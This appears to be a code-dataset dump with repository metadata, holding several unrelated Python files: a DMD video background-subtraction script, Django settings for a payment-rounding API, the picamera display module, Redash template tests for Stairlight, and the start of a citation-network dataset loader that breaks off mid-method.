] | null | null | null | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
] | null | null | null | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
] | null | null | null | # AP Ruymgaart DMD, main script
import numpy as np, time, sys, copy, matplotlib.pyplot as plt
from videoFunctions import *
from tensorFiles import *
from plottingFunctions import *
from dmd import *
#==== input (command line, from run.sh) ====
print('===================================== start DMD =================================\nInput:')
cmds = processCmdArgs(sys.argv)
for c in cmds: print('\t', c, cmds[c])
dt,nv,fname,ftype,images,f0,f1,outname,frPlot,binv = None,None,None,None,None,None,None,None,[],None
try:
nv = int(cmds['modes'])
dt,thresh = float(cmds['dt']), float(cmds['thresh'])
fname,ftype,outname = cmds['movie'], cmds['type'], cmds['outname']
f0,f1 = int(cmds['framestart']), int(cmds['framestop'])
szplotfr = cmds['plotframes'].split(',')
binv = cmds['inv'].lower() == 'true'
for h in szplotfr: frPlot.append(int(h))
except: print('** input error **'), exit()
if ftype == 'npz': images = tnsrFile2numpy(fname)
else: images = video2numpy(fname)
print('Movie-shape=', images.shape, 'dt=',dt, 'Nr modes=', nv, 'file-type=', ftype, 'frame', f0, 'to', f1)
print('Plot frames', frPlot, 'output file name', outname)
#==== DMD & dmdDynamics ====
X, szX, szY = flattenVideo(images, f0, f1)
[Phi,A,S,L,X1,X2,b] = DMD(X, szY, szX, nv)
Xdmd, T, omega = dmdDynamics(X1,L,b,Phi,nv,dt=dt)
#==== foreground/background ====
BG = abs(copy.copy(Xdmd.T))
FG = X[0:len(X)-1] - BG + 0.3 #- subtract low rank BG and add a grey background
print(np.min(FG), np.max(FG))
if False:
R = copy.copy(FG)
R[R > 0] = 0.0
FG = FG - R
BG = BG + R
for n in range(len(FG)): FG[n] = FG[n]/np.max(FG[n])
FG[FG < thresh] = 0.0 # thresholding (see paper)
if False: #- alternative attempt to select modes, not used now
omegaCut = 0.0
Xlr,Xhr = np.zeros(Xdmd.shape), np.zeros(Xdmd.shape)
for k in range(T.shape[1]):
LRt, HRt = dmdDynamicsLrVec(X1, L, b, Phi, k, dt, omegaCut=omegaCut)
Xlr[:,k] = LRt
Xhr[:,k] = HRt
L2 = np.abs(Xlr.T)
H2 = np.abs(Xhr.T)
lrMv = reshape2video(L2/np.max(L2), szY, szX)
np2movieFile(lrMv, outname+'_xlr', invert=binv)
hrMv = reshape2video(H2/np.max(H2), szY, szX)
np2movieFile(hrMv, outname+'_xhr', invert=binv)
#==== output ====
plotSV(np.log(np.abs(S) + 1), fname=outname+'_logSV.png')
plotSV(np.abs(omega), fname=outname+'_omega.png')
bgMv = reshape2video(BG, szY, szX)
bgMv = bgMv/np.max(bgMv)
np2movieFile(bgMv, outname+'_LR', invert=binv)
fgMv = reshape2video(FG, szY, szX)
np2movieFile(fgMv, outname+'_diff', invert=binv)
origMv = reshape2video(X[0:len(X)-1], szY, szX)
for fr in frPlot:
plotFrame(bgMv, fr, outname+'_LR_%d' % (fr))
plotFrame(fgMv, fr, outname+'_diff_%d' % (fr))
plotFrame(origMv, fr, outname+'_orig_%d' % (fr)) | 36.337838 | 106 | 0.641502 | # AP Ruymgaart DMD, main script
import numpy as np, time, sys, copy, matplotlib.pyplot as plt
from videoFunctions import *
from tensorFiles import *
from plottingFunctions import *
from dmd import *
#==== input (command line, from run.sh) ====
print('===================================== start DMD =================================\nInput:')
cmds = processCmdArgs(sys.argv)
for c in cmds: print('\t', c, cmds[c])
dt,nv,fname,ftype,images,f0,f1,outname,frPlot,binv = None,None,None,None,None,None,None,None,[],None
try:
nv = int(cmds['modes'])
dt,thresh = float(cmds['dt']), float(cmds['thresh'])
fname,ftype,outname = cmds['movie'], cmds['type'], cmds['outname']
f0,f1 = int(cmds['framestart']), int(cmds['framestop'])
szplotfr = cmds['plotframes'].split(',')
binv = cmds['inv'].lower() == 'true'
for h in szplotfr: frPlot.append(int(h))
except: print('** input error **'), exit()
if ftype == 'npz': images = tnsrFile2numpy(fname)
else: images = video2numpy(fname)
print('Movie-shape=', images.shape, 'dt=',dt, 'Nr modes=', nv, 'file-type=', ftype, 'frame', f0, 'to', f1)
print('Plot frames', frPlot, 'output file name', outname)
#==== DMD & dmdDynamics ====
X, szX, szY = flattenVideo(images, f0, f1)
[Phi,A,S,L,X1,X2,b] = DMD(X, szY, szX, nv)
Xdmd, T, omega = dmdDynamics(X1,L,b,Phi,nv,dt=dt)
#==== foreground/background ====
BG = abs(copy.copy(Xdmd.T))
FG = X[0:len(X)-1] - BG + 0.3 #- subtract low rank BG and add a grey background
print(np.min(FG), np.max(FG))
if False:
R = copy.copy(FG)
R[R > 0] = 0.0
FG = FG - R
BG = BG + R
for n in range(len(FG)): FG[n] = FG[n]/np.max(FG[n])
FG[FG < thresh] = 0.0 # thresholding (see paper)
if False: #- alternative attempt to select modes, not used now
omegaCut = 0.0
Xlr,Xhr = np.zeros(Xdmd.shape), np.zeros(Xdmd.shape)
for k in range(T.shape[1]):
LRt, HRt = dmdDynamicsLrVec(X1, L, b, Phi, k, dt, omegaCut=omegaCut)
Xlr[:,k] = LRt
Xhr[:,k] = HRt
L2 = np.abs(Xlr.T)
H2 = np.abs(Xhr.T)
lrMv = reshape2video(L2/np.max(L2), szY, szX)
np2movieFile(lrMv, outname+'_xlr', invert=binv)
hrMv = reshape2video(H2/np.max(H2), szY, szX)
np2movieFile(hrMv, outname+'_xhr', invert=binv)
#==== output ====
plotSV(np.log(np.abs(S) + 1), fname=outname+'_logSV.png')
plotSV(np.abs(omega), fname=outname+'_omega.png')
bgMv = reshape2video(BG, szY, szX)
bgMv = bgMv/np.max(bgMv)
np2movieFile(bgMv, outname+'_LR', invert=binv)
fgMv = reshape2video(FG, szY, szX)
np2movieFile(fgMv, outname+'_diff', invert=binv)
origMv = reshape2video(X[0:len(X)-1], szY, szX)
for fr in frPlot:
plotFrame(bgMv, fr, outname+'_LR_%d' % (fr))
plotFrame(fgMv, fr, outname+'_diff_%d' % (fr))
plotFrame(origMv, fr, outname+'_orig_%d' % (fr)) | 0 | 0 | 0 |
483599ed8536eddf29b6ea87ea65105e1967fb97 | 2,479 | py | Python | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | from pathlib import Path
import environ
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('READ_DOT_ENV_FILE', default=True)
if READ_DOT_ENV_FILE:
env.read_env()
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = env('SECRET_KEY')
DEBUG = env.bool('DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'payment-rounding.adrian-kalinin.dev', 'payment-rounding-api-5x85t.ondigitalocean.app']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'payment_rounding.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'payment_rounding.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
| 22.536364 | 117 | 0.673255 | from pathlib import Path
import environ
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('READ_DOT_ENV_FILE', default=True)
if READ_DOT_ENV_FILE:
env.read_env()
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = env('SECRET_KEY')
DEBUG = env.bool('DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'payment-rounding.adrian-kalinin.dev', 'payment-rounding-api-5x85t.ondigitalocean.app']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'payment_rounding.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'payment_rounding.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
| 0 | 0 | 0 |
e90ce6e277dc1dee758c86d3003b819de9af1d2f | 12,772 | py | Python | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | 1 | 2021-05-30T08:20:37.000Z | 2021-05-30T08:20:37.000Z | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages/picamera/display.py | johnson880319/Software | 045894227f359e0a3a3ec5b7a53f8d1ebc06acdd | [
"CC-BY-2.0"
] | null | null | null | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2015 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import mimetypes
import ctypes as ct
from functools import reduce
from operator import or_
from . import bcm_host, mmalobj as mo, mmal
from .encoders import PiCookedOneImageEncoder, PiRawOneImageEncoder
from .exc import PiCameraRuntimeError, PiCameraValueError
| 39.788162 | 104 | 0.633104 | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2015 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import mimetypes
import ctypes as ct
from functools import reduce
from operator import or_
from . import bcm_host, mmalobj as mo, mmal
from .encoders import PiCookedOneImageEncoder, PiRawOneImageEncoder
from .exc import PiCameraRuntimeError, PiCameraValueError
class PiDisplay(object):
__slots__ = (
'_display',
'_info',
'_transform',
'_exif_tags',
)
_ROTATIONS = {
bcm_host.DISPMANX_NO_ROTATE: 0,
bcm_host.DISPMANX_ROTATE_90: 90,
bcm_host.DISPMANX_ROTATE_180: 180,
bcm_host.DISPMANX_ROTATE_270: 270,
}
_ROTATIONS_R = {v: k for k, v in _ROTATIONS.items()}
_ROTATIONS_MASK = reduce(or_, _ROTATIONS.keys(), 0)
RAW_FORMATS = {
'yuv',
'rgb',
'rgba',
'bgr',
'bgra',
}
def __init__(self, display_num=0):
bcm_host.bcm_host_init()
self._exif_tags = {}
self._display = bcm_host.vc_dispmanx_display_open(display_num)
self._transform = bcm_host.DISPMANX_NO_ROTATE
if not self._display:
raise PiCameraRuntimeError('unable to open display %d' % display_num)
self._info = bcm_host.DISPMANX_MODEINFO_T()
if bcm_host.vc_dispmanx_display_get_info(self._display, self._info):
raise PiCameraRuntimeError('unable to get display info')
def close(self):
bcm_host.vc_dispmanx_display_close(self._display)
self._display = None
@property
def closed(self):
return self._display is None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def _get_output_format(self, output):
"""
Given an output object, attempt to determine the requested format.
We attempt to determine the filename of the *output* object and derive
a MIME type from the extension. If *output* has no filename, an error
is raised.
"""
if isinstance(output, bytes):
filename = output.decode('utf-8')
elif isinstance(output, str):
filename = output
else:
try:
filename = output.name
except AttributeError:
raise PiCameraValueError(
'Format must be specified when output has no filename')
(type, encoding) = mimetypes.guess_type(filename, strict=False)
if not type:
raise PiCameraValueError(
'Unable to determine type from filename %s' % filename)
return type
def _get_image_format(self, output, format=None):
"""
Given an output object and an optional format, attempt to determine the
requested image format.
This method is used by all capture methods to determine the requested
output format. If *format* is specified as a MIME-type the "image/"
prefix is stripped. If *format* is not specified, then
:meth:`_get_output_format` will be called to attempt to determine
format from the *output* object.
"""
if isinstance(format, bytes):
format = format.decode('utf-8')
format = format or self._get_output_format(output)
format = (
format[6:] if format.startswith('image/') else
format)
if format == 'x-ms-bmp':
format = 'bmp'
return format
def _get_image_encoder(self, output_port, format, resize, **options):
"""
Construct an image encoder for the requested parameters.
This method is called by :meth:`capture`. The *output_port* parameter
gives the MMAL port that the encoder should read output from. The
*format* parameter indicates the image format and will be one of:
* ``'jpeg'``
* ``'png'``
* ``'gif'``
* ``'bmp'``
* ``'yuv'``
* ``'rgb'``
* ``'rgba'``
* ``'bgr'``
* ``'bgra'``
The *resize* parameter indicates the size that the encoder should
resize the output to (presumably by including a resizer in the
pipeline). Finally, *options* includes extra keyword arguments that
should be passed verbatim to the encoder.
"""
encoder_class = (
PiRawOneImageEncoder if format in self.RAW_FORMATS else
PiCookedOneImageEncoder)
return encoder_class(
self, None, output_port, format, resize, **options)
def capture(self, output, format=None, resize=None, **options):
format = self._get_image_format(output, format)
if format == 'yuv':
raise PiCameraValueError('YUV format is unsupported at this time')
res = self.resolution
if (self._info.transform & bcm_host.DISPMANX_ROTATE_90) or (
self._info.transform & bcm_host.DISPMANX_ROTATE_270):
res = res.transpose()
transform = self._transform
if (transform & bcm_host.DISPMANX_ROTATE_90) or (
transform & bcm_host.DISPMANX_ROTATE_270):
res = res.transpose()
source = mo.MMALPythonSource()
source.outputs[0].format = mmal.MMAL_ENCODING_RGB24
if format == 'bgr':
source.outputs[0].format = mmal.MMAL_ENCODING_BGR24
transform |= bcm_host.DISPMANX_SNAPSHOT_SWAP_RED_BLUE
source.outputs[0].framesize = res
source.outputs[0].commit()
encoder = self._get_image_encoder(
source.outputs[0], format, resize, **options)
try:
encoder.start(output)
try:
pitch = res.pad(width=16).width * 3
image_ptr = ct.c_uint32()
resource = bcm_host.vc_dispmanx_resource_create(
bcm_host.VC_IMAGE_RGB888, res.width, res.height, image_ptr)
if not resource:
raise PiCameraRuntimeError(
'unable to allocate resource for capture')
try:
buf = source.outputs[0].get_buffer()
if bcm_host.vc_dispmanx_snapshot(self._display, resource, transform):
raise PiCameraRuntimeError('failed to capture snapshot')
rect = bcm_host.VC_RECT_T(0, 0, res.width, res.height)
if bcm_host.vc_dispmanx_resource_read_data(resource, rect, buf._buf[0].data, pitch):
raise PiCameraRuntimeError('failed to read snapshot')
buf._buf[0].length = pitch * res.height
buf._buf[0].flags = (
mmal.MMAL_BUFFER_HEADER_FLAG_EOS |
mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
)
finally:
bcm_host.vc_dispmanx_resource_delete(resource)
source.outputs[0].send_buffer(buf)
# XXX Anything more intelligent than a 10 second default?
encoder.wait(10)
finally:
encoder.stop()
finally:
encoder.close()
def _calculate_transform(self):
"""
Calculates a reverse transform to undo any that the boot configuration
applies (presumably the user has altered the boot configuration to
match their screen orientation so they want any capture to appear
correctly oriented by default). This is then modified by the transforms
specified in the :attr:`rotation`, :attr:`hflip` and :attr:`vflip`
attributes.
"""
r = PiDisplay._ROTATIONS[self._info.transform & PiDisplay._ROTATIONS_MASK]
r = (360 - r) % 360 # undo the native rotation
r = (r + self.rotation) % 360 # add selected rotation
result = PiDisplay._ROTATIONS_R[r]
result |= self._info.transform & ( # undo flips by re-doing them
bcm_host.DISPMANX_FLIP_HRIZ | bcm_host.DISPMANX_FLIP_VERT
)
return result
@property
def resolution(self):
"""
Retrieves the resolution of the display device.
"""
return mo.PiResolution(width=self._info.width, height=self._info.height)
def _get_hflip(self):
return bool(self._info.transform & bcm_host.DISPMANX_FLIP_HRIZ)
def _set_hflip(self, value):
if value:
self._info.transform |= bcm_host.DISPMANX_FLIP_HRIZ
else:
self._info.transform &= ~bcm_host.DISPMANX_FLIP_HRIZ
hflip = property(_get_hflip, _set_hflip, doc="""\
Retrieves or sets whether snapshots are horizontally flipped.
When queried, the :attr:`vflip` property returns a boolean indicating
whether or not the output of :meth:`capture` is horizontally flipped.
The default is ``False``.
.. note::
This property only affects snapshots; it does not affect the
display output itself.
""")
def _get_vflip(self):
return bool(self._info.transform & bcm_host.DISPMANX_FLIP_VERT)
def _set_vflip(self, value):
if value:
self._info.transform |= bcm_host.DISPMANX_FLIP_VERT
else:
self._info.transform &= ~bcm_host.DISPMANX_FLIP_VERT
vflip = property(_get_vflip, _set_vflip, doc="""\
Retrieves or sets whether snapshots are vertically flipped.
When queried, the :attr:`vflip` property returns a boolean indicating
whether or not the output of :meth:`capture` is vertically flipped. The
default is ``False``.
.. note::
This property only affects snapshots; it does not affect the
display output itself.
""")
def _get_rotation(self):
return PiDisplay._ROTATIONS[self._transform & PiDisplay._ROTATIONS_MASK]
def _set_rotation(self, value):
try:
self._transform = (
self._transform & ~PiDisplay._ROTATIONS_MASK) | PiDisplay._ROTATIONS_R[value]
except KeyError:
raise PiCameraValueError('invalid rotation %d' % value)
rotation = property(_get_rotation, _set_rotation, doc="""\
Retrieves or sets the rotation of snapshots.
When queried, the :attr:`rotation` property returns the rotation
applied to the result of :meth:`capture`. Valid values are 0, 90, 180,
and 270. When set, the property changes the rotation applied to the
result of :meth:`capture`. The default is 0.
.. note::
This property only affects snapshots; it does not affect the
display itself. To rotate the display itself, modify the
``display_rotate`` value in :file:`/boot/config.txt`.
""")
def _get_exif_tags(self):
return self._exif_tags
def _set_exif_tags(self, value):
self._exif_tags = {k: v for k, v in value.items()}
exif_tags = property(_get_exif_tags, _set_exif_tags)
| 4,188 | 6,458 | 23 |
312ace47627ecca7abc37b266c2ad03723ce1d59 | 4,484 | py | Python | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | tests/stairlight/source/test_redash.py | tosh223/stairlight | a9b01d3453c34bd1af66e8a9c353576f0eeefb5d | [
"MIT"
] | null | null | null | import os
from typing import Any, Dict
import pytest
from src.stairlight.config import Configurator
from src.stairlight.key import StairlightConfigKey
from src.stairlight.source.redash import (
RedashTemplate,
RedashTemplateSource,
TemplateSourceType,
)
@pytest.mark.parametrize(
"env_key, path",
[
("REDASH_DATABASE_URL", "src/stairlight/source/sql/redash_queries.sql"),
],
)
@pytest.mark.parametrize(
(
"query_id, query_name, query_str, "
"data_source_name, params, mapped_table_attributes"
),
[
(
5,
"Copy of (#4) New Query",
"SELECT * FROM {{ table }}",
"metadata",
{"table": "dashboards"},
{
"Labels": {"Category": "Redash test"},
"Parameters": {"table": "dashboards"},
"TableName": "Copy of (#4) New Query",
},
),
],
)
| 29.5 | 86 | 0.634701 | import os
from typing import Any, Dict
import pytest
from src.stairlight.config import Configurator
from src.stairlight.key import StairlightConfigKey
from src.stairlight.source.redash import (
RedashTemplate,
RedashTemplateSource,
TemplateSourceType,
)
@pytest.mark.parametrize(
"env_key, path",
[
("REDASH_DATABASE_URL", "src/stairlight/source/sql/redash_queries.sql"),
],
)
class TestRedashTemplateSource:
@pytest.fixture(scope="function")
def redash_template_source(
self,
configurator: Configurator,
mapping_config: Dict[str, Any],
env_key: str,
path: str,
) -> RedashTemplateSource:
stairlight_config = configurator.read(prefix="stairlight_redash")
source_attributes = {
StairlightConfigKey.TEMPLATE_SOURCE_TYPE: TemplateSourceType.REDASH.value,
StairlightConfigKey.Redash.DATABASE_URL_ENV_VAR: env_key,
StairlightConfigKey.Redash.DATA_SOURCE_NAME: "metadata",
StairlightConfigKey.Redash.QUERY_IDS: [1, 3, 5],
}
return RedashTemplateSource(
stairlight_config=stairlight_config,
mapping_config=mapping_config,
source_attributes=source_attributes,
)
def test_build_query_string(
self,
redash_template_source: RedashTemplateSource,
path: str,
):
expected = """SELECT
queries.id,
queries.name,
queries.query,
data_sources.name
FROM
queries
INNER JOIN data_sources
ON queries.data_source_id = data_sources.id
WHERE data_sources.name = :data_source AND queries.id IN :query_ids"""
actual = redash_template_source.build_query_string(path=path)
assert actual == expected
def test_read_query_from_file(
self,
redash_template_source: RedashTemplateSource,
path: str,
):
expected = """SELECT
queries.id,
queries.name,
queries.query,
data_sources.name
FROM
queries
INNER JOIN data_sources
ON queries.data_source_id = data_sources.id
"""
actual = redash_template_source.read_query_from_file(path=path)
assert actual == expected
def test_get_connection_str(
self,
monkeypatch,
redash_template_source: RedashTemplateSource,
env_key: str,
):
expected = "postgresql://postgres:testpassword@testhost/postgres"
envs = {env_key: expected}
monkeypatch.setattr(os, "environ", envs)
actual = redash_template_source.get_connection_str()
assert actual == expected
@pytest.mark.parametrize(
(
"query_id, query_name, query_str, "
"data_source_name, params, mapped_table_attributes"
),
[
(
5,
"Copy of (#4) New Query",
"SELECT * FROM {{ table }}",
"metadata",
{"table": "dashboards"},
{
"Labels": {"Category": "Redash test"},
"Parameters": {"table": "dashboards"},
"TableName": "Copy of (#4) New Query",
},
),
],
)
class TestRedashTemplate:
@pytest.fixture(scope="function")
def redash_template(
self,
configurator: Configurator,
query_id: int,
query_name: str,
query_str: str,
data_source_name: str,
params: Dict[str, Any],
mapped_table_attributes: Dict[str, Any],
) -> RedashTemplate:
mapping_config = configurator.read(prefix="mapping_redash")
return RedashTemplate(
mapping_config=mapping_config,
query_id=query_id,
query_name=query_name,
query_str=query_str,
data_source_name=data_source_name,
)
def test_find_mapped_table_attributes(
self,
redash_template: RedashTemplate,
mapped_table_attributes: Dict[str, Any],
):
expected = mapped_table_attributes
actual = {}
for attribute in redash_template.find_mapped_table_attributes():
if attribute:
actual = attribute
assert actual == expected
def test_get_template_str(self, redash_template: RedashTemplate):
assert redash_template.get_template_str() == "SELECT * FROM {{ table }}"
def test_render(self, redash_template, params: RedashTemplate):
assert redash_template.render(params=params) == "SELECT * FROM dashboards"
| 3,193 | 304 | 44 |
016bbec27abd5c066c9c544b6cd0e4027d21bf59 | 6,680 | py | Python | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | data_loaders/citation_networks.py | hcnoh/gcn-pytorch | 2ef4ada8ae60ff4402ee5430def49e441f650e8c | [
"MIT"
] | null | null | null | import os
import pickle
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
DATASET_DIR = "datasets"
| 31.809524 | 79 | 0.570359 | import os
import pickle
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
DATASET_DIR = "datasets"
class CitationNetworks(Dataset):
def __init__(self, dataset_dir=DATASET_DIR) -> None:
super().__init__()
# will be defined in child classes
self.dataset_name = None
self.directed = None
self.num_features = None
self.dataset_dir = dataset_dir
self.num_train_samples_per_class = 20
self.num_test_samples = 1000
def __getitem__(self, index):
return self.X[index], self.Y[index]
def __len__(self):
return self.num_nodes
def preprocess(self):
'''
The preprocess methods are from the following references:
- http://proceedings.mlr.press/v48/yanga16.pdf
- https://arxiv.org/pdf/1609.02907.pdf
'''
cites_path = os.path.join(
self.dataset_dir, "{}.cites".format(self.dataset_name)
)
col_names = ["To", "From"]
cites_df = pd.read_csv(
cites_path, sep="\t", names=col_names, header=None
)
content_path = os.path.join(
self.dataset_dir, "{}.content".format(self.dataset_name)
)
col_names = ["Node"] + list(range(self.num_features)) + ["Label"]
content_df = pd.read_csv(
content_path, sep="\t", names=col_names, header=None
)
content_df["Feature"] = content_df[range(self.num_features)]\
.agg(list, axis=1)
content_df = content_df[["Node", "Feature", "Label"]]
node_list = np.array([str(node) for node in content_df["Node"].values])
node2idx = {node: idx for idx, node in enumerate(node_list)}
num_nodes = node_list.shape[0]
# Row normalization for the feature matrix
X = np.array(
[np.array(feature) for feature in content_df["Feature"].values]
)
X = X / np.sum(X, axis=-1, keepdims=True)
